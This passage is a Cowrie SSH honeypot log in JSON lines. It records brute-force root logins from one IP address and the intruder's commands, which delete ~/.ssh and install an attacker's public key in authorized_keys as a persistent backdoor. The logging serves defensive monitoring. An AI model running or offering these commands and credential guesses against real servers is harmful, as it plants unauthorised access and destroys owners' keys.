tr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:52:31.567556Z","src_ip":"212.227.235.229","session":"c32996c641d4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T18:52:31.778945Z","src_ip":"212.227.235.229","session":"25f3acfc3d2f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:52:31.779826Z","src_ip":"212.227.235.229","session":"25f3acfc3d2f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33472,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6bd45c39a2b","protocol":"ssh","message":"New connection: 212.227.235.229:33472 (1.2.3.4:22) [session: f6bd45c39a2b]","sensor":"my-vps","timestamp":"2025-08-26T18:52:32.022381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:52:32.023506Z","src_ip":"212.227.235.229","session":"f6bd45c39a2b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:52:32.277576Z","src_ip":"212.227.235.229","session":"f6bd45c39a2b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:52:32.784073Z","src_ip":"212.227.235.229","session":"c32996c641d4"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:52:33.079388Z","src_ip":"212.227.235.229","session":"c61fb0993e95"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:52:33.080460Z","src_ip":"212.227.235.229","session":"c32996c641d4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T18:52:33.332577Z","src_ip":"212.227.235.229","session":"f6bd45c39a2b"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:52:34.588702Z","src_ip":"212.227.235.229","session":"f6bd45c39a2b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33484,"dst_ip":"1.2.3.4","dst_port":22,"session":"6021c8a28e85","protocol":"ssh","message":"New connection: 212.227.235.229:33484 (1.2.3.4:22) [session: 6021c8a28e85]","sensor":"my-vps","timestamp":"2025-08-26T18:52:34.833056Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:52:34.833872Z","src_ip":"212.227.235.229","session":"6021c8a28e85"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:52:35.078697Z","src_ip":"212.227.235.229","session":"6021c8a28e85"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:52:36.096941Z","src_ip":"212.227.235.229","session":"6021c8a28e85"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:52:36.343199Z","src_ip":"212.227.235.229","session":"6021c8a28e85"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:52:36.351584Z","src_ip":"212.227.235.229","session":"25f3acfc3d2f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34109,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac04214b3abb","protocol":"ssh","message":"New connection: 212.227.235.229:34109 (1.2.3.4:22) [session: ac04214b3abb]","sensor":"my-vps","timestamp":"2025-08-26T18:53:11.397806Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:53:11.405048Z","src_ip":"212.227.235.229","session":"ac04214b3abb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:53:11.648218Z","src_ip":"212.227.235.229","session":"ac04214b3abb"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"123","message":"login attempt [ftptest/123] failed","sensor":"my-vps","timestamp":"2025-08-26T18:53:12.634000Z","src_ip":"212.227.235.229","session":"ac04214b3abb"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:53:13.884269Z","src_ip":"212.227.235.229","session":"ac04214b3abb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56216,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5ae7afb2753","protocol":"ssh","message":"New connection: 212.227.235.229:56216 (1.2.3.4:22) [session: f5ae7afb2753]","sensor":"my-vps","timestamp":"2025-08-26T18:53:59.102319Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:53:59.103597Z","src_ip":"212.227.235.229","session":"f5ae7afb2753"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:53:59.339147Z","src_ip":"212.227.235.229","session":"f5ae7afb2753"}
{"eventid":"cowrie.login.success","username":"root","password":"Welcome@2025","message":"login attempt [root/Welcome@2025] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:54:00.325197Z","src_ip":"212.227.235.229","session":"f5ae7afb2753"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:54:00.866054Z","src_ip":"212.227.235.229","session":"f5ae7afb2753"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:54:00.866817Z","src_ip":"212.227.235.229","session":"f5ae7afb2753"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:54:00.867729Z","src_ip":"212.227.235.229","session":"f5ae7afb2753"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:54:01.104068Z","src_ip":"212.227.235.229","session":"f5ae7afb2753"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:54:01.638612Z","src_ip":"212.227.235.229","session":"f5ae7afb2753"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T18:54:01.639533Z","src_ip":"212.227.235.229","session":"f5ae7afb2753"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T18:54:01.876915Z","src_ip":"212.227.235.229","session":"f5ae7afb2753"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:54:01.877994Z","src_ip":"212.227.235.229","session":"f5ae7afb2753"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57830,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbf8ade69224","protocol":"ssh","message":"New connection: 212.227.235.229:57830 (1.2.3.4:22) [session: dbf8ade69224]","sensor":"my-vps","timestamp":"2025-08-26T18:54:06.208503Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:54:06.209513Z","src_ip":"212.227.235.229","session":"dbf8ade69224"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:54:06.446579Z","src_ip":"212.227.235.229","session":"dbf8ade69224"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T18:54:07.435515Z","src_ip":"212.227.235.229","session":"dbf8ade69224"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:54:08.674095Z","src_ip":"212.227.235.229","session":"dbf8ade69224"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57834,"dst_ip":"1.2.3.4","dst_port":22,"session":"e06a13294cad","protocol":"ssh","message":"New connection: 212.227.235.229:57834 (1.2.3.4:22) [session: e06a13294cad]","sensor":"my-vps","timestamp":"2025-08-26T18:54:08.903694Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:54:08.904799Z","src_ip":"212.227.235.229","session":"e06a13294cad"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:54:09.138724Z","src_ip":"212.227.235.229","session":"e06a13294cad"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:54:10.113658Z","src_ip":"212.227.235.229","session":"e06a13294cad"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:54:10.349668Z","src_ip":"212.227.235.229","session":"e06a13294cad"}
{"eventid":"cowrie.session.closed","duration":"11.2","message":"Connection lost after 11.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:54:10.350733Z","src_ip":"212.227.235.229","session":"f5ae7afb2753"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46809,"dst_ip":"1.2.3.4","dst_port":22,"session":"52587d36c564","protocol":"ssh","message":"New connection: 212.227.235.229:46809 (1.2.3.4:22) [session: 52587d36c564]","sensor":"my-vps","timestamp":"2025-08-26T18:54:22.718272Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:54:22.726719Z","src_ip":"212.227.235.229","session":"52587d36c564"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:54:22.974706Z","src_ip":"212.227.235.229","session":"52587d36c564"}
{"eventid":"cowrie.login.success","username":"root","password":"welcome@12","message":"login attempt [root/welcome@12] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:54:23.988185Z","src_ip":"212.227.235.229","session":"52587d36c564"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:54:24.518988Z","src_ip":"212.227.235.229","session":"52587d36c564"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:54:24.519666Z","src_ip":"212.227.235.229","session":"52587d36c564"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:54:24.520764Z","src_ip":"212.227.235.229","session":"52587d36c564"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:54:24.779939Z","src_ip":"212.227.235.229","session":"52587d36c564"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:54:25.398036Z","src_ip":"212.227.235.229","session":"52587d36c564"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== 